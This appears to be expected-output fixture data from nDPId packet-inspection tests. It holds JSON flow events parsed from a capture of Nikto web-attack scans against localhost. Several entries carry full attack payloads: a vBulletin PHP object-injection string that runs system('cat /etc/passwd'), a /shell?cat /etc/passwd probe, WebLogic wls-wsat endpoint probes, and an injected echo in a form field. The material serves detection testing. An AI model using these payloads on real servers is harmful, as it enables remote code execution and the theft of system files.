{"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +01383{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01390{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +01390{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 